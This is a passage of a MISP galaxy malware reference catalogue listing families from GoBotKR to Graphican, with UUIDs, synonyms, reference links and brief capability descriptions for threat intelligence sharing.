Metadata key | Value |
---|---|
type | [] |
GoBotKR
Internal MISP references
UUID 56060ca3-ee34-4df9-bcaa-70267d8440c1
which can be used as unique global reference for GoBotKR
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
goCryptoLocker
Internal MISP references
UUID f93da83e-0c2f-4dc0-82c6-2fcc6339dcf2
which can be used as unique global reference for goCryptoLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker - webarchive
- https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html - webarchive
- https://github.com/LimerBoy/goCryptoLocker/blob/master/main.go - webarchive
- https://twitter.com/GrujaRS/status/1254657823478353920 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Godlike12
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Godlike12.
Known Synonyms |
---|
GOSLU |
Internal MISP references
UUID f62ad36f-e274-4fdb-b71d-887f9cd9c215
which can be used as unique global reference for Godlike12
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12 - webarchive
- https://www.volexity.com/blog/2020/03/31/storm-cloud-unleashed-tibetan-community-focus-of-highly-targeted-fake-flash-campaign/ - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://securelist.com/holy-water-ongoing-targeted-water-holing-attack-in-asia/96311/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
goDoH
A proof of concept for data exfiltration via DoH (DNS over HTTPS), written in Go.
Internal MISP references
UUID b54b4238-550f-42a7-9e62-d1ad5e4d3904
which can be used as unique global reference for goDoH
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Godzilla Loader
Internal MISP references
UUID 9cfdc3ea-c838-4ac5-bff2-57c92ec24b48
which can be used as unique global reference for Godzilla Loader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader - webarchive
- https://www.arbornetworks.com/blog/asert/trickbot-banker-insights/ - webarchive
- https://www.kernelmode.info/forum/viewtopic0692.html?f=16&t=4349 - webarchive
- https://research.checkpoint.com/godzilla-loader-and-the-long-tail-of-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gofing
A file infector written in Go, discovered by Karsten Hahn in February 2022. According to Karsten, despite its internal naming, it is not polymorphic and the virus body is not encrypted. Gofing uses the Coldfire Golang malware development library.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gofing.
Known Synonyms |
---|
Velocity Polymorphic Compression Malware |
Internal MISP references
UUID ba142293-2f22-46e3-8b8e-086f3571f14c
which can be used as unique global reference for Gofing
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Goggles
Internal MISP references
UUID 7d89e8dc-4999-47e9-b497-b476e368a8d2
which can be used as unique global reference for Goggles
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoGoogle
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoGoogle.
Known Synonyms |
---|
BossiTossi |
Internal MISP references
UUID 034a3db0-b53c-4ec1-9390-4b6f214e1233
which can be used as unique global reference for GoGoogle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoGra
According to Symantec, GoGra is a previously unseen backdoor that was deployed against a media organization in South Asia in November 2023. It is written in Go and uses the Microsoft Graph API to interact with a command-and-control (C&C) server hosted on Microsoft mail services.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoGra.
Known Synonyms |
---|
Onedrivetools |
Internal MISP references
UUID feb79c31-cf88-4127-8ee9-dde4dfb99396
which can be used as unique global reference for GoGra
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GOLDBACKDOOR
Internal MISP references
UUID 54f5cf02-6fdc-43b4-af06-87af1a901264
which can be used as unique global reference for GOLDBACKDOOR
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.goldbackdoor - webarchive
- https://github.com/blackorbird/APT_REPORT/blob/master/group123/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf - webarchive
- https://www.0x0v1.com/rearchive-goldbackdoor/ - webarchive
- https://stairwell.com/wp-content/uploads/2022/04/Stairwell-threat-report-The-ink-stained-trail-of-GOLDBACKDOOR.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldenEye
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoldenEye.
Known Synonyms |
---|
Petya/Mischa |
Internal MISP references
UUID d7196f6a-757b-4124-ae28-f403e5d84fcb
which can be used as unique global reference for GoldenEye
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye - webarchive
- https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/ - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/12/goldeneye-ransomware-the-petyamischa-combo-rebranded/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldenHelper
Internal MISP references
UUID 1dd854b4-d8e6-438c-a0b1-6991b8b6ff92
which can be used as unique global reference for GoldenHelper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenhelper - webarchive
- https://tomiwa-xy.medium.com/static-analysis-of-goldenhelper-malware-golden-tax-malware-d9f85a88e74d - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldenSpy
According to SecurityWeek, the GoldenSpy malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.
One of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing “Intelligent Tax,” a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.
Although it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.
Internal MISP references
UUID 86b8bd8d-19c5-4c7a-befd-0eb6297776bc
which can be used as unique global reference for GoldenSpy
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy - webarchive
- https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-3-new-and-improved-uninstaller/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-4-goldenhelper-malware-embedded-in-official-golden-tax-software/ - webarchive
- https://www.ic3.gov/media/news/2020/200728.pdf - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/ - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/ - webarchive
- https://www.bka.de/SharedDocs/Downloads/DE/IhreSicherheit/Warnhinweise/WarnhinweisGOLDENSPY.pdf - webarchive
- https://www.ic3.gov/Media/News/2020/201103-1.pdf - webarchive
- https://trustwave.azureedge.net/media/16908/the-golden-tax-department-and-emergence-of-goldenspy-malware.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldMax
GoldMax is a command and control backdoor written in Go and used by the NOBELIUM threat actor group. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environment variables and information about the network where it is running.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoldMax.
Known Synonyms |
---|
SUNSHUTTLE |
Internal MISP references
UUID 9a3429d7-e4a8-43c5-8786-0b3a1c841a5f
which can be used as unique global reference for GoldMax
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.goldmax - webarchive
- https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf - webarchive
- https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ - webarchive
- https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/ - webarchive
- https://www.youtube.com/watch?v=koZkHEJqPrU - webarchive
- https://securelist.com/extracting-type-information-from-go-binaries/104715/ - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-110a - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf - webarchive
- https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques - webarchive
- https://securelist.com/it-threat-evolution-q2-2023/110355/ - webarchive
- https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ - webarchive
- https://x0r19x91.gitlab.io/post/malware-analysis/sunshuttle/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoldDragon
GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, fileless, PowerShell-based attack leveraging steganography was executed. The initial attack was first observed in December 2017, when a Korean-language spear phishing campaign targeted organizations linked with the Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.
The malware was capable of basic reconnaissance, data exfiltration and downloading of additional components from its C&C server.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoldDragon.
Known Synonyms |
---|
Lovexxx |
Internal MISP references
UUID 2297799c-f93c-4903-b9af-32b6b599912c
which can be used as unique global reference for GoldDragon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gold_dragon - webarchive
- https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf - webarchive
- https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite - webarchive
- https://blog.talosintelligence.com/2021/11/kimsuky-abuses-blogs-delivers-malware.html - webarchive
- https://asec.ahnlab.com/en/31089/ - webarchive
- https://www.youtube.com/watch?v=rfzmHjZX70s - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Golroted
Internal MISP references
UUID 9cd98c61-0dfa-4af6-b334-65eb43bc8d9d
which can be used as unique global reference for Golroted
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoMet
Internal MISP references
UUID 020a84b4-d717-48e6-9333-07c55523bc57
which can be used as unique global reference for GoMet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gomorrah stealer
Gomorrah is a stealer with little or no obfuscation that appeared around March 2020. It is sold for about $150 lifetime for v4 (originally $400 for v3) or $100 per month by its developer called "th3darkly / lucifer" (who is also the developer of the CosaNostra botnet). The malware's main functionalities are stealing (passwords, cryptocurrency wallets) and loading of tasks and other payloads.
Internal MISP references
UUID ea9a9585-2a99-42b9-a724-bf7af82bb986
which can be used as unique global reference for Gomorrah stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Goodor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Goodor.
Known Synonyms |
---|
Fuerboos |
Internal MISP references
UUID 91b52a5f-420a-484b-8e1e-a91d402db6c5
which can be used as unique global reference for Goodor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.goodor - webarchive
- https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control - webarchive
- https://norfolkinfosec.com/a-new-look-at-old-dragonfly-malware-goodor/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GoogleDrive RAT
Internal MISP references
UUID d1298818-6425-49be-9764-9f119d964efd
which can be used as unique global reference for GoogleDrive RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GooPic Drooper
Internal MISP references
UUID 1ebb6107-f97b-45f6-ae81-a671ac437181
which can be used as unique global reference for GooPic Drooper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GooseEgg
Internal MISP references
UUID 5d38cab2-ad33-467f-9ce9-27fea834fb13
which can be used as unique global reference for GooseEgg
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GootKit
Gootkit is a banking trojan consisting of an x86 loader and a payload embedding Node.js as well as a set of JavaScript scripts. The loader downloads the payload, stores it in the registry and injects it into a copy of the loader process. The loader also contains two encrypted DLLs intended to be injected into each browser process launched, in order to position the payload as a man-in-the-browser and allow it to apply the webinjects received from the command and control server to HTTP(S) exchanges. This allows Gootkit to intercept HTTP(S) requests and responses, steal their content or modify it according to the webinjects.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GootKit.
Known Synonyms |
---|
Waldek |
Xswkit |
talalpek |
Internal MISP references
UUID 329efac7-922e-4d8b-90a9-4a87c3281753
which can be used as unique global reference for GootKit
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gootkit - webarchive
- https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope - webarchive
- https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/ - webarchive
- https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055 - webarchive
- https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan - webarchive
- https://labs.sentinelone.com/gootkit-banking-trojan-deep-dive-anti-analysis-features/ - webarchive
- https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/ - webarchive
- https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ - webarchive
- https://news.drweb.com/show/?i=4338&lng=en - webarchive
- https://twitter.com/MsftSecIntel/status/1366542130731094021 - webarchive
- https://www.trendmicro.com/en_us/research/20/l/investigating-the-gootkit-loader.html - webarchive
- https://www.youtube.com/watch?v=242Tn0IL2jE - webarchive
- https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection - webarchive
- http://www.vkremez.com/2018/04/lets-learn-in-depth-dive-into-gootkit.html - webarchive
- https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/ - webarchive
- https://www.certego.net/en/news/malware-tales-gootkit/ - webarchive
- https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html - webarchive
- https://dissectingmalwa.re/nicht-so-goot-breaking-down-gootkit-and-jasper-ftcode.html - webarchive
- https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps - webarchive
- https://www.us-cert.gov/ncas/alerts/TA16-336A - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://www.trendmicro.com/en_us/research/23/a/gootkit-loader-actively-targets-the-australian-healthcare-indust.html - webarchive
- https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/ - webarchive
- https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/ - webarchive
- https://securelist.com/gootkit-the-cautious-trojan/102731/ - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/ - webarchive
- https://5556002.fs1.hubspotusercontent-na1.net/hubfs/5556002/2022%20PDF%20Download%20Assets/ADA%20Compliant%20pdfs/Reports/PUBLIC_Gootloader%20-%20Foreign%20Intelligence%20Service.pdf - webarchive
- https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/ - webarchive
- https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf - webarchive
- https://twitter.com/jhencinski/status/1464268732096815105 - webarchive
- https://www.youtube.com/watch?v=QgUlPvEE4aw - webarchive
- https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/?cmp=30728 - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md - webarchive
- https://securityintelligence.com/gootkit-bobbing-and-weaving-to-avoid-prying-eyes/ - webarchive
- https://securityintelligence.com/gootkit-developers-dress-it-up-with-web-traffic-proxy/ - webarchive
- https://dannyquist.github.io/gootkit-reversing-ghidra/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- http://blog.cert.societegenerale.com/2015/04/analyzing-gootkits-persistence-mechanism.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gophe
Internal MISP references
UUID fb2e42bf-6845-4eb3-9fe7-85a447762bce
which can be used as unique global reference for Gophe
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gopuram
Internal MISP references
UUID 6dc4e71e-7372-4287-bdee-04da17a0d275
which can be used as unique global reference for Gopuram
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GOTROJ
Internal MISP references
UUID b4446bc0-41a1-4934-9fd0-a73b91589994
which can be used as unique global reference for GOTROJ
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GovRAT
Internal MISP references
UUID 9fbb5822-1660-4651-9f57-b6f83a881786
which can be used as unique global reference for GovRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Gozi
Lineage overview:
- 2000: Ursnif aka Snifula
- 2006: Gozi v1.0, Gozi CRM, CRM, Papras
- 2010: Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)
- 2010: Gozi Prinimalka -> Vawtrak/Neverquest
In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, who borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and from some other kits. Gozi v1.0 thus had a formgrabber module and is often classified as Ursnif aka Snifula.
In September 2010, the source code of a particular Gozi CRM DLL version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0), and to Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gozi.
Known Synonyms |
---|
CRM |
Gozi CRM |
Papras |
Snifula |
Ursnif |
Internal MISP references
UUID 75329c9e-a218-4299-87b2-8f667cd9e40c
which can be used as unique global reference for Gozi
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi - webarchive
- https://viuleeenz.github.io/posts/2023/03/dynamic-binary-instrumentation-for-malware-analysis/ - webarchive
- https://kostas-ts.medium.com/ursnif-vs-italy-il-pdf-del-destino-5c83d6281072 - webarchive
- https://securityintelligence.com/x-force/wailingcrab-malware-misues-mqtt-messaging-protocol/ - webarchive
- https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html - webarchive
- https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007 - webarchive
- http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/ - webarchive
- https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/gozi-italian-shellcode-dance - webarchive
- https://github.com/mlodic/ursnif_beacon_decryptor - webarchive
- https://0xtoxin.github.io/threat%20breakdown/Gozi-Italy-Campaign/ - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/ - webarchive
- https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://www.youtube.com/watch?v=BcFbkjUVc7o - webarchive
- http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html - webarchive
- https://securelist.com/financial-cyberthreats-in-2020/101638/ - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-swathmore - webarchive
- https://therecord.media/gozi-malware-gang-member-arrested-in-colombia/ - webarchive
- https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/ - webarchive
- https://medium.com/csis-techblog/chapter-1-from-gozi-to-isfb-the-history-of-a-mythical-malware-family-82e592577fef - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://lokalhost.pl/gozi_tree.txt - webarchive
- https://viuleeenz.github.io/posts/2023/12/applied-emulation-decrypting-ursnif-strings-with-unicorn/ - webarchive
- https://www.secureworks.com/research/gozi - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GPCode
Internal MISP references
UUID 127c3d76-6323-4363-93e0-cd06ade0dd52
which can be used as unique global reference for GPCode
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode - webarchive
- https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2 - webarchive
- https://de.securelist.com/analysis/59479/erpresser/ - webarchive
- http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/ - webarchive
- http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GrabBot
Internal MISP references
UUID 0092b005-b032-4e34-9c7e-7dd0e71a85fb
which can be used as unique global reference for GrabBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Graftor
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Graftor.
Known Synonyms |
---|
MewsSpy |
Internal MISP references
UUID 94b942e2-cc29-447b-97e2-e496cbf2aadf
which can be used as unique global reference for Graftor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Grager
Grager is a backdoor deployed against three organizations in Taiwan, Hong Kong, and Vietnam in April 2024. Analysis of this backdoor revealed that it uses the Graph API to communicate with a command and control (C&C) server hosted on Microsoft OneDrive. The backdoor decrypts a client ID and refresh token for OneDrive from a blob contained within its file body. It supports the following commands:
- Retrieve machine information, including machine name, user, IP address, and machine architecture
- Download or upload a file
- Execute a file
- Gather file system information, including available drives, their sizes, and types of drives
Internal MISP references
UUID a5cf8d64-262f-47fd-a48b-1c2bcfa4f641
which can be used as unique global reference for Grager
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GRAMDOOR
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GRAMDOOR.
Known Synonyms |
---|
Small Sieve |
Internal MISP references
UUID 0dfa69cc-cc70-4944-af42-7e1f923e6b6b
which can be used as unique global reference for GRAMDOOR
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.gramdoor - webarchive
- https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html - webarchive
- https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611 - webarchive
- https://www.mandiant.com/resources/telegram-malware-iranian-espionage - webarchive
- https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Grandoreiro
According to ESET Research, Grandoreiro is a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.
Internal MISP references
UUID c62219e2-74a3-49c2-a33d-0789b820c467
which can be used as unique global reference for Grandoreiro
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/copacabana-barcelona-cross-continental-threat-brazilian-banking-malware - webarchive
- https://www.welivesecurity.com/en/eset-research/eset-takes-part-global-operation-disrupt-grandoreiro-banking-trojan/ - webarchive
- https://www.zscaler.com/blogs/security-research/grandoreiro-banking-trojan-new-ttps-targeting-various-industry-verticals - webarchive
- https://blueliv.com/resources/reports/MiniReport-Blueliv-Bancos-ESP-LAT.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/police-disrupt-grandoreiro-banking-malware-operation-make-arrests/ - webarchive
- https://socradar.io/grandoreiro-malware-campaign-a-global-threat-to-banking-security/ - webarchive
- https://securityintelligence.com/x-force/grandoreiro-banking-trojan-unleashed/ - webarchive
- https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/ - webarchive
- https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ - webarchive
- https://www.incibe.es/sites/default/files/contenidos/estudios/doc/incibe-cert_study_grandoreiro_analysis_2022_v1.pdf - webarchive
- https://securelist.com/grandoreiro-banking-trojan/114257/ - webarchive
- https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/grandoreiro-banking-malware-resurfaces-for-tax-season - webarchive
- https://www.metabaseq.com/grandoreiro-banking-malware-deciphering-the-dga/ - webarchive
- http://www.interior.gob.es/prensa/noticias/-/asset_publisher/GHU8Ap6ztgsg/content/id/13552853 - webarchive
- https://therecord.media/spain-arrests-16-for-distributing-the-mekotio-and-grandoreiro-banking-trojans/ - webarchive
- https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GrandSteal
Internal MISP references
UUID 626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14
which can be used as unique global reference for GrandSteal
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GraphDrop
PANW Unit 42 describes this malware as capable of uploading and downloading files as well as loading additional shellcode payloads into selected target processes. It uses the Microsoft Graph API and Dropbox API as C&C channels.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GraphDrop.
Known Synonyms |
---|
GraphicalProton |
SPICYBEAT |
Internal MISP references
UUID 15d96a22-118b-4933-8258-e9cc4dd9719a
which can be used as unique global reference for GraphDrop
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphdrop - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf - webarchive
- https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a - webarchive
- https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ - webarchive
- https://www.fortinet.com/blog/threat-research/teamcity-intrusion-saga-apt29-suspected-exploiting-cve-2023-42793 - webarchive
- https://www.avertium.com/resources/threat-reports/evolution-of-russian-apt29-new-attacks-and-techniques-uncovered - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
GraphicalNeutrino
This loader abuses the benign service Notion for data exchange.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GraphicalNeutrino.
Known Synonyms |
---|
SNOWYAMBER |
Internal MISP references
UUID cb92a200-b4f0-4983-8d5d-6bf529b66da9
which can be used as unique global reference for GraphicalNeutrino
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0727-1.pdf - webarchive
- https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58 - webarchive
- https://blogs.blackberry.com/en/2023/03/nobelium-targets-eu-governments-assisting-ukraine - webarchive
- https://mssplab.github.io/threat-hunting/2023/06/02/malware-analysis-apt29.html - webarchive
- https://www.gov.pl/attachment/ee91f24d-3e67-436d-aa50-7fa56acf789d - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2023-0127.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Graphican
